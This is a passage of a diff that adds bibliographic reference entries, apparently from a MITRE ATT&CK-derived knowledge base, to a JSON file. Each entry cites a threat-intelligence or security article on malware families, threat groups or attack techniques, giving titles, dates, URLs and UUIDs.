"59f98ae1-c62d-460f-8d2a-9ae287b59953", + "value": "BlackBerry BlackCat Threat Overview" + }, + { + "description": "Brandt, Andrew. (2022, July 14). BlackCat ransomware attacks not merely a byproduct of bad luck. Retrieved December 20, 2022.", + "meta": { + "date_accessed": "2022-12-20T00:00:00Z", + "date_published": "2022-07-14T00:00:00Z", + "refs": [ + "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/" + ], + "source": "MITRE", + "title": "BlackCat ransomware attacks not merely a byproduct of bad luck" + }, + "related": [], + "uuid": "481a0106-d5b6-532c-8f5b-6c0c477185f4", + "value": "Sophos BlackCat Jul 2022" + }, + { + "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry . Retrieved June 10, 2020.", + "meta": { + "date_accessed": "2020-06-10T00:00:00Z", + "date_published": "2016-01-03T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" + ], + "source": "MITRE", + "title": "BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry" + }, + "related": [], + "uuid": "a0103079-c966-46b6-8871-c01f7f0eea4c", + "value": "ESET BlackEnergy Jan 2016" + }, + { + "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved May 18, 2016.", + "meta": { + "date_accessed": "2016-05-18T00:00:00Z", + "date_published": "2016-01-03T00:00:00Z", + "refs": [ + "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" + ], + "source": "MITRE", + "title": "BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry" + }, + "related": [], + "uuid": "4d626eb9-3722-4aa4-b95e-1650cc2865c2", + "value": "ESEST Black Energy Jan 2016" + }, + { + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "meta": { + "date_accessed": "2016-03-24T00:00:00Z", + "date_published": "2014-01-01T00:00:00Z", + "refs": [ + "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" + ], + "source": "MITRE", + "title": "BlackEnergy & Quedagh: The convergence of crimeware and APT attacks" + }, + "related": [], + "uuid": "5f228fb5-d959-4c4a-bb8c-f9dc01d5af07", + "value": "F-Secure BlackEnergy 2014" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, October 16). BlackOasis APT and new targeted attacks leveraging zero-day exploit. Retrieved February 15, 2018.", + "meta": { + "date_accessed": "2018-02-15T00:00:00Z", + "date_published": "2017-10-16T00:00:00Z", + "refs": [ + "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/" + ], + "source": "MITRE, Tidal Cyber", + "title": "BlackOasis APT and new targeted attacks leveraging zero-day exploit" + }, + "related": [], + "uuid": "66121c37-6b66-4ab2-9f63-1adb80dcec62", + "value": "Securelist BlackOasis Oct 2017" + }, + { + "description": "Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2020-10-05T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/" + ], + "source": "MITRE", + "title": "Black-T: New Cryptojacking Variant from TeamTNT" + }, + "related": [], + "uuid": "d4351c8e-026d-4660-9344-166481ecf64a", + "value": "Palo Alto Black-T October 2020" + }, + { + "description": "Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.", + "meta": { + "date_accessed": "2022-07-08T00:00:00Z", + "date_published": "2020-03-14T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/" + ], + "source": "MITRE", + "title": "BlackWater Malware Abuses Cloudflare Workers for C2 Communication" + }, + "related": [], + "uuid": "053895e8-da3f-4291-a728-2198fde774e7", + "value": "BlackWater Malware Cloudflare Workers" + }, + { + "description": "NHS Digital . (2020, August 20). BLINDINGCAN Remote Access Trojan. Retrieved August 20, 2020.", + "meta": { + "date_accessed": "2020-08-20T00:00:00Z", + "date_published": "2020-08-20T00:00:00Z", + "refs": [ + "https://digital.nhs.uk/cyber-alerts/2020/cc-3603" + ], + "source": "MITRE", + "title": "BLINDINGCAN Remote Access Trojan" + }, + "related": [], + "uuid": "acca4c89-acce-4916-88b6-f4dac7d8ab19", + "value": "NHS UK BLINDINGCAN Aug 2020" + }, + { + "description": "Microsoft Azure. (2021, December 29). Blob snapshots. Retrieved March 2, 2022.", + "meta": { + "date_accessed": "2022-03-02T00:00:00Z", + "date_published": "2021-12-29T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/storage/blobs/snapshots-overview" + ], + "source": "MITRE", + "title": "Blob snapshots" + }, + "related": [], + "uuid": "152628ab-3244-4cc7-a68e-a220b652039b", + "value": "Azure Blob Snapshots" + }, + { + "description": "Patrick Wardle. (2018, July 23). Block Blocking Login Items. Retrieved October 1, 2021.", + "meta": { + "date_accessed": "2021-10-01T00:00:00Z", + "date_published": "2018-07-23T00:00:00Z", + "refs": [ + "https://objective-see.com/blog/blog_0x31.html" + ], + "source": "MITRE", + "title": "Block Blocking Login Items" + }, + "related": [], + "uuid": "76511800-8331-476b-ab4f-0daa587f5e22", + "value": "objsee block blocking login items" + }, + { + "description": "Mohta, A. (n.d.). Block Chrome Extensions using Google Chrome Group Policy Settings. Retrieved January 10, 2018.", + "meta": { + "date_accessed": "2018-01-10T00:00:00Z", + "refs": [ + "http://www.technospot.net/blogs/block-chrome-extensions-using-google-chrome-group-policy-settings/" + ], + "source": "MITRE", + "title": "Block Chrome Extensions using Google Chrome Group Policy Settings" + }, + "related": [], + "uuid": "76faf20c-27d3-4e67-8ab7-8480f8f88ae5", + "value": "Technospot Chrome Extensions GP" + }, + { + "description": "Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved January 22, 2018.", + "meta": { + "date_accessed": "2018-01-22T00:00:00Z", + "date_published": "2017-11-26T00:00:00Z", + "refs": [ + "https://twitter.com/Evi1cg/status/935027922397573120" + ], + "source": "MITRE", + "title": "block cmd.exe ? try this :" + }, + "related": [], + "uuid": "b292b85e-68eb-43c3-9b5b-222810e2f26a", + "value": "Evi1cg Forfiles Nov 2017" + }, + { + "description": "David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. Retrieved November 20, 2017.", + "meta": { + "date_accessed": "2017-11-20T00:00:00Z", + "date_published": "2015-01-01T00:00:00Z", + "refs": [ + "http://www.icir.org/vern/papers/meek-PETS-2015.pdf" + ], + "source": "MITRE", + "title": "Blocking-resistant communication through domain fronting" + }, + "related": [], + "uuid": "52671075-c425-40c7-a49a-b75e44a0c58a", + "value": "Fifield Blocking Resistent Communication through domain fronting 2015" + }, + { + "description": "Robbins, A., Vazarkar, R., and Schroeder, W. (2016, April 17). Bloodhound: Six Degrees of Domain Admin. Retrieved March 5, 2019.", + "meta": { + "date_accessed": "2019-03-05T00:00:00Z", + "date_published": "2016-04-17T00:00:00Z", + "refs": [ + "https://github.com/BloodHoundAD/BloodHound" + ], + "source": "MITRE", + "title": "Bloodhound: Six Degrees of Domain Admin" + }, + "related": [], + "uuid": "e90b4941-5dff-4f38-b4dd-af3426fd621e", + "value": "GitHub Bloodhound" + }, + { + "description": "Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019.", + "meta": { + "date_accessed": "2019-11-21T00:00:00Z", + "date_published": "2018-10-14T00:00:00Z", + "refs": [ + "https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815" + ], + "source": "MITRE", + "title": "Blue Cloud of Death: Red Teaming Azure" + }, + "related": [], + "uuid": "39b0adf6-c71e-4501-b8bb-fab82718486b", + "value": "Blue Cloud of Death Video" + }, + { + "description": "Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019.", + "meta": { + "date_accessed": "2019-10-23T00:00:00Z", + "date_published": "2018-05-11T00:00:00Z", + "refs": [ + "https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1" + ], + "source": "MITRE", + "title": "Blue Cloud of Death: Red Teaming Azure" + }, + "related": [], + "uuid": "0c764280-9d8c-4fa4-9088-170f02550d4c", + "value": "Blue Cloud of Death" + }, + { + "description": "Apple Inc. (2013, April 23). Bonjour Overview. Retrieved October 11, 2021.", + "meta": { + "date_accessed": "2021-10-11T00:00:00Z", + "date_published": "2013-04-23T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introduction.html" + ], + "source": "MITRE", + "title": "Bonjour Overview" + }, + "related": [], + "uuid": "b8538d67-ab91-41c2-9cc3-a7b00c6b372a", + "value": "apple doco bonjour description" + }, + { + "description": "Weyne, F. (2017, April). Booby trap a shortcut with a backdoor. Retrieved October 3, 2023.", + "meta": { + "date_accessed": "2023-10-03T00:00:00Z", + "date_published": "2017-04-01T00:00:00Z", + "refs": [ + "https://www.uperesia.com/booby-trapped-shortcut" + ], + "source": "MITRE", + "title": "Booby trap a shortcut with a backdoor" + }, + "related": [], + "uuid": "1a820fb8-3cff-584b-804f-9bad0592873b", + "value": "Booby Trap Shortcut 2017" + }, + { + "description": "Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August 30, 2021.", + "meta": { + "date_accessed": "2021-08-30T00:00:00Z", + "date_published": "2017-10-16T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg" + ], + "source": "MITRE", + "title": "bootcfg" + }, + "related": [], + "uuid": "44ffaa60-4461-4463-a1b5-abc868368c0a", + "value": "Microsoft Bootcfg" + }, + { + "description": "Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October 4, 2020.", + "meta": { + "date_accessed": "2020-10-04T00:00:00Z", + "refs": [ + "https://www.imperva.com/learn/ddos/booters-stressers-ddosers/" + ], + "source": "MITRE", + "title": "Booters, Stressers and DDoSers" + }, + "related": [], + "uuid": "86f87ec6-058e-45a7-9314-0579a2b4e8f2", + "value": "Imperva DDoS for Hire" + }, + { + "description": "Wikipedia. (n.d.). Booting. Retrieved November 13, 2019.", + "meta": { + "date_accessed": "2019-11-13T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Booting" + ], + "source": "MITRE", + "title": "Booting" + }, + "related": [], + "uuid": "6d9c72cb-6cda-445e-89ea-7e695063d49a", + "value": "Wikipedia Booting" + }, + { + "description": "Glyer, C.. (2017, June 22). Boot What?. Retrieved May 4, 2020.", + "meta": { + "date_accessed": "2020-05-04T00:00:00Z", + "date_published": "2017-06-22T00:00:00Z", + "refs": [ + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf" + ], + "source": "MITRE", + "title": "Boot What?" + }, + "related": [], + "uuid": "835c9e5d-b291-43d9-9b8a-2978aa8c8cd3", + "value": "FireEye BOOTRASH SANS" + }, + { + "description": "Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.", + "meta": { + "date_accessed": "2019-04-16T00:00:00Z", + "date_published": "2019-03-26T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/" + ], + "source": "MITRE", + "title": "Born This Way? Origins of LockerGoga" + }, + "related": [], + "uuid": "8f058923-f2f7-4c0e-b90a-c7a0d5e62186", + "value": "Unit42 LockerGoga 2019" + }, + { + "description": "Vest, J. (2017, October 9). Borrowing Microsoft MetaData and Signatures to Hide Binary Payloads. Retrieved September 10, 2019.", + "meta": { + "date_accessed": "2019-09-10T00:00:00Z", + "date_published": "2017-10-09T00:00:00Z", + "refs": [ + "https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/" + ], + "source": "MITRE", + "title": "Borrowing Microsoft MetaData and Signatures to Hide Binary Payloads" + }, + "related": [], + "uuid": "156efefd-793f-4219-8904-ef160a45c9ec", + "value": "Threatexpress MetaTwin 2017" + }, + { + "description": "The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive Linux Backdoor Technical Analysis. Retrieved September 29, 2023.", + "meta": { + "date_accessed": "2023-09-29T00:00:00Z", + "date_published": "2022-05-11T00:00:00Z", + "refs": [ + "https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/" + ], + "source": "MITRE", + "title": "BPFDoor - An Evasive Linux Backdoor Technical Analysis" + }, + "related": [], + "uuid": "01c8337f-614b-5f63-870f-5c880b390922", + "value": "Sandfly BPFDoor 2022" + }, + { + "description": "Dr. Nestori Syynimaa. (2021, January 31). BPRT unleashed: Joining multiple devices to Azure AD and Intune. Retrieved March 4, 2022.", + "meta": { + "date_accessed": "2022-03-04T00:00:00Z", + "date_published": "2021-01-31T00:00:00Z", + "refs": [ + "https://o365blog.com/post/bprt/" + ], + "source": "MITRE", + "title": "BPRT unleashed: Joining multiple devices to Azure AD and Intune" + }, + "related": [], + "uuid": "19af3fce-eb57-4e67-9678-1968e9ea9677", + "value": "AADInternals - BPRT" + }, + { + "description": "Shahar Tavor. (n.d.). BrazKing Android Malware Upgraded and Targeting Brazilian Banks. Retrieved March 24, 2023.", + "meta": { + "date_accessed": "2023-03-24T00:00:00Z", + "refs": [ + "https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/" + ], + "source": "MITRE", + "title": "BrazKing Android Malware Upgraded and Targeting Brazilian Banks" + }, + "related": [], + "uuid": "fa813afd-b8f0-535b-9108-6d3d3989b6b9", + "value": "Brazking-Websockets" + }, + { + "description": "MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.", + "meta": { + "date_accessed": "2021-08-04T00:00:00Z", + "date_published": "2021-05-28T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/" + ], + "source": "MITRE", + "title": "Breaking down NOBELIUM’s latest early-stage toolset" + }, + "related": [], + "uuid": "52464e69-ff9e-4101-9596-dd0c6404bf76", + "value": "MSTIC Nobelium Toolset May 2021" + }, + { + "description": "Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.", + "meta": { + "date_accessed": "2015-03-27T00:00:00Z", + "date_published": "2013-08-07T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html" + ], + "source": "MITRE", + "title": "Breaking Down the China Chopper Web Shell - Part I" + }, + "related": [], + "uuid": "6d1e2b0a-fed2-490b-be25-6580dfb7d6aa", + "value": "Lee 2013" + }, + { + "description": "Hegel, Tom. (2023, January 19). Breaking Down the SEO Poisoning Attack | How Attackers Are Hijacking Search Results. Retrieved February 21, 2023.", + "meta": { + "date_accessed": "2023-02-21T00:00:00Z", + "date_published": "2023-01-19T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/blog/breaking-down-the-seo-poisoning-attack-how-attackers-are-hijacking-search-results/" + ], + "source": "MITRE", + "title": "Breaking Down the SEO Poisoning Attack | How Attackers Are Hijacking Search Results" + }, + "related": [], + "uuid": "7989f0de-90b8-5e6d-bc20-1764610d1568", + "value": "sentinelone-malvertising" + }, + { + "description": "Juuso Salonen. (2012, September 5). Breaking into the OS X keychain. Retrieved July 15, 2017.", + "meta": { + "date_accessed": "2017-07-15T00:00:00Z", + "date_published": "2012-09-05T00:00:00Z", + "refs": [ + "http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain" + ], + "source": "MITRE", + "title": "Breaking into the OS X keychain" + }, + "related": [], + "uuid": "bde3ff9c-fbf9-49c4-b414-70dc8356d57d", + "value": "OS X Keychain" + }, + { + "description": "Tim Brown. (2011, June 29). Breaking the links: Exploiting the linker. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "date_published": "2011-06-29T00:00:00Z", + "refs": [ + "http://www.nth-dimension.org.uk/pub/BTL.pdf" + ], + "source": "MITRE", + "title": "Breaking the links: Exploiting the linker" + }, + "related": [], + "uuid": "24674e91-5cbf-4023-98ae-a9f0968ad99a", + "value": "Brown Exploiting Linkers" + }, + { + "description": "McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.", + "meta": { + "date_accessed": "2020-06-23T00:00:00Z", + "date_published": "2019-12-04T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html" + ], + "source": "MITRE", + "title": "Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774)" + }, + "related": [], + "uuid": "f23a773f-9c50-4193-877d-97f7c13f48f1", + "value": "FireEye Outlook Dec 2019" + }, + { + "description": "Cisco Talos Blog. (2022, December 8). Breaking the silence - Recent Truebot activity. Retrieved May 8, 2023.", + "meta": { + "date_accessed": "2023-05-08T00:00:00Z", + "date_published": "2022-12-08T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/" + ], + "source": "Tidal Cyber", + "title": "Breaking the silence - Recent Truebot activity" + }, + "related": [], + "uuid": "bcf92374-48a3-480f-a679-9fd34b67bcdd", + "value": "Cisco Talos Blog December 08 2022" + }, + { + "description": "Kiwi. (2016, April 6). Breakout Recap: Cybersecurity Best Practices Part 1 - Preventing Opportunistic Attacks. Retrieved October 3, 2018.", + "meta": { + "date_accessed": "2018-10-03T00:00:00Z", + "date_published": "2016-04-06T00:00:00Z", + "refs": [ + "https://live.paloaltonetworks.com/t5/Ignite-2016-Blog/Breakout-Recap-Cybersecurity-Best-Practices-Part-1-Preventing/ba-p/75913" + ], + "source": "MITRE", + "title": "Breakout Recap: Cybersecurity Best Practices Part 1 - Preventing Opportunistic Attacks" + }, + "related": [], + "uuid": "60fac434-2815-4568-b951-4bde55c2e3af", + "value": "PaloAlto Preventing Opportunistic Attacks Apr 2016" + }, + { + "description": "Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 8, 2021.", + "meta": { + "date_accessed": "2021-10-08T00:00:00Z", + "date_published": "2018-06-18T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique" + ], + "source": "MITRE", + "title": "Bring Your Own Land (BYOL) – A Novel Red Teaming Technique" + }, + "related": [], + "uuid": "104a1c1c-0899-4ff9-a5c4-73de702c467d", + "value": "Mandiant BYOL 2018" + }, + { + "description": "Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "date_published": "2018-06-18T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique" + ], + "source": "MITRE", + "title": "Bring Your Own Land (BYOL) – A Novel Red Teaming Technique" + }, + "related": [], + "uuid": "445efe8b-659a-4023-afc7-aa7cd21ee5a1", + "value": "Mandiant BYOL" + }, + { + "description": "Bischoff, P. (2020, October 15). Broadvoice database of more than 350 million customer records exposed online. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2020-10-15T00:00:00Z", + "refs": [ + "https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/" + ], + "source": "MITRE", + "title": "Broadvoice database of more than 350 million customer records exposed online" + }, + "related": [], + "uuid": "fa0eac56-45ea-4628-88cf-b843874b4a4d", + "value": "Comparitech Leak" + }, + { + "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2020-10-15T00:00:00Z", + "refs": [ + "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/" + ], + "source": "MITRE", + "title": "Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts" + }, + "related": [], + "uuid": "91d20979-d4e7-4372-8a83-1e1512c8d3a9", + "value": "ThreatPost Broadvoice Leak" + }, + { + "description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.", + "meta": { + "date_accessed": "2018-01-04T00:00:00Z", + "date_published": "2017-10-12T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + ], + "source": "MITRE, Tidal Cyber", + "title": "BRONZE BUTLER Targets Japanese Enterprises" + }, + "related": [], + "uuid": "c62d8d1a-cd1b-4b39-95b6-68f3f063dacf", + "value": "Secureworks BRONZE BUTLER Oct 2017" + }, + { + "description": "Secureworks. (2021, January 1). BRONZE HUNTLEY Threat Profile. Retrieved May 5, 2021.", + "meta": { + "date_accessed": "2021-05-05T00:00:00Z", + "date_published": "2021-01-01T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/bronze-huntley" + ], + "source": "MITRE", + "title": "BRONZE HUNTLEY Threat Profile" + }, + "related": [], + "uuid": "9558ebc5-4de3-4b1d-b32c-a170adbc3451", + "value": "Secureworks BRONZE HUNTLEY" + }, + { + "description": "Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.", + "meta": { + "date_accessed": "2021-04-13T00:00:00Z", + "date_published": "2019-12-29T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/bronze-president-targets-ngos" + ], + "source": "MITRE, Tidal Cyber", + "title": "BRONZE PRESIDENT Targets NGOs" + }, + "related": [], + "uuid": "019889e0-a2ce-476f-9a31-2fc394de2821", + "value": "Secureworks BRONZE PRESIDENT December 2019" + }, + { + "description": "Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017.", + "meta": { + "date_accessed": "2017-07-13T00:00:00Z", + "date_published": "2017-06-27T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/bronze-union" + ], + "source": "MITRE, Tidal Cyber", + "title": "BRONZE UNION Cyberespionage Persists Despite Disclosures" + }, + "related": [], + "uuid": "42adda47-f5d6-4d34-9b3d-3748a782f886", + "value": "SecureWorks BRONZE UNION June 2017" + }, + { + "description": "Wikipedia. (2017, October 8). Browser Extension. Retrieved January 11, 2018.", + "meta": { + "date_accessed": "2018-01-11T00:00:00Z", + "date_published": "2017-10-08T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Browser_extension" + ], + "source": "MITRE", + "title": "Browser Extension" + }, + "related": [], + "uuid": "52aef082-3f8e-41b4-af95-6631ce4c9e91", + "value": "Wikipedia Browser Extension" + }, + { + "description": "mr.d0x. (2022, March 15). Browser In The Browser (BITB) Attack. Retrieved March 8, 2023.", + "meta": { + "date_accessed": "2023-03-08T00:00:00Z", + "date_published": "2022-03-15T00:00:00Z", + "refs": [ + "https://mrd0x.com/browser-in-the-browser-phishing-attack/" + ], + "source": "MITRE", + "title": "Browser In The Browser (BITB) Attack" + }, + "related": [], + "uuid": "447f6b34-ac3a-58d9-af96-aa1d947a3e0e", + "value": "Mr. D0x BitB 2022" + }, + { + "description": "Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018.", + "meta": { + "date_accessed": "2018-01-10T00:00:00Z", + "refs": [ + "https://www.cobaltstrike.com/help-browser-pivoting" + ], + "source": "MITRE", + "title": "Browser Pivoting" + }, + "related": [], + "uuid": "0c1dd453-7281-4ee4-9c8f-bdc401cf48d7", + "value": "Cobalt Strike Browser Pivot" + }, + { + "description": "Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.", + "meta": { + "date_accessed": "2016-09-26T00:00:00Z", + "date_published": "2016-09-06T00:00:00Z", + "refs": [ + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" + ], + "source": "MITRE, Tidal Cyber", + "title": "Buckeye cyberespionage group shifts gaze from US to Hong Kong" + }, + "related": [], + "uuid": "dbf3ce3e-bcf2-4e47-ad42-839e51967395", + "value": "Symantec Buckeye" + }, + { + "description": "ESET Research. (2019, April 30). Buhtrap backdoor and Buran ransomware distributed via major advertising platform. Retrieved May 11, 2020.", + "meta": { + "date_accessed": "2020-05-11T00:00:00Z", + "date_published": "2019-04-30T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/" + ], + "source": "MITRE", + "title": "Buhtrap backdoor and Buran ransomware distributed via major advertising platform" + }, + "related": [], + "uuid": "e308a957-fb5c-44e8-a846-be6daef4b940", + "value": "ESET Buhtrap and Buran April 2019" + }, + { + "description": "Bunce, D. (2019, October 31). Building A Custom Tool For Shellcode Analysis. Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "date_published": "2019-10-31T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/" + ], + "source": "MITRE", + "title": "Building A Custom Tool For Shellcode Analysis" + }, + "related": [], + "uuid": "f49bfd00-48d5-4d84-a7b7-cb23fcdf861b", + "value": "S1 Custom Shellcode Tool" + }, + { + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.", + "meta": { + "date_accessed": "2019-02-18T00:00:00Z", + "date_published": "2014-10-02T00:00:00Z", + "refs": [ + "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/" + ], + "source": "MITRE", + "title": "Building a DGA Classifier: Part 2, Feature Engineering" + }, + "related": [], + "uuid": "c92fb2ec-c144-42d4-bd42-179d3d737db0", + "value": "Data Driven Security DGA" + }, + { + "description": "Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019.", + "meta": { + "date_accessed": "2019-06-03T00:00:00Z", + "date_published": "2019-03-12T00:00:00Z", + "refs": [ + "https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/" + ], + "source": "MITRE", + "title": "Building an Office macro to spoof parent processes and command line arguments" + }, + "related": [], + "uuid": "b06b72ba-dbd6-4190-941a-0cdd3d659ab6", + "value": "CTD PPID Spoofing Macro Mar 2019" + }, + { + "description": "Cybereason. (2022, August 17). Bumblebee Loader – The High Road to Enterprise Domain Control. Retrieved August 29, 2022.", + "meta": { + "date_accessed": "2022-08-29T00:00:00Z", + "date_published": "2022-08-17T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control" + ], + "source": "MITRE", + "title": "Bumblebee Loader – The High Road to Enterprise Domain Control" + }, + "related": [], + "uuid": "64bfb605-af69-4df0-ae56-32fa997516bc", + "value": "Cybereason Bumblebee August 2022" + }, + { + "description": "Kamble, V. (2022, June 28). Bumblebee: New Loader Rapidly Assuming Central Position in Cyber-crime Ecosystem. Retrieved August 24, 2022.", + "meta": { + "date_accessed": "2022-08-24T00:00:00Z", + "date_published": "2022-06-28T00:00:00Z", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime" + ], + "source": "MITRE", + "title": "Bumblebee: New Loader Rapidly Assuming Central Position in Cyber-crime Ecosystem" + }, + "related": [], + "uuid": "81bfabad-b5b3-4e45-ac1d-1e2e829fca33", + "value": "Symantec Bumblebee June 2022" + }, + { + "description": "Patrick Wardle. (2019, June 20). Burned by Fire(fox). Retrieved October 1, 2021.", + "meta": { + "date_accessed": "2021-10-01T00:00:00Z", + "date_published": "2019-06-20T00:00:00Z", + "refs": [ + "https://objective-see.com/blog/blog_0x44.html" + ], + "source": "MITRE", + "title": "Burned by Fire(fox)" + }, + "related": [], + "uuid": "866c5305-8629-4f09-8dfe-192c8573ffb0", + "value": "objsee netwire backdoor 2019" + }, + { + "description": "Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018.", + "meta": { + "date_accessed": "2018-07-08T00:00:00Z", + "date_published": "2018-05-03T00:00:00Z", + "refs": [ + "https://401trg.github.io/pages/burning-umbrella.html" + ], + "source": "MITRE", + "title": "Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers" + }, + "related": [], + "uuid": "e3f1f2e4-dc1c-4d9c-925d-47013f44a69f", + "value": "401 TRG Winnti Umbrella May 2018" + }, + { + "description": "Thomas Reed. (2016, March 31). Bypassing Apple's Gatekeeper. Retrieved July 5, 2017.", + "meta": { + "date_accessed": "2017-07-05T00:00:00Z", + "date_published": "2016-03-31T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/" + ], + "source": "MITRE", + "title": "Bypassing Apple's Gatekeeper" + }, + "related": [], + "uuid": "957a0916-614e-4c7b-a6dd-1baa4fc6f93e", + "value": "Bypassing Gatekeeper" + }, + { + "description": "Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017.", + "meta": { + "date_accessed": "2017-05-25T00:00:00Z", + "date_published": 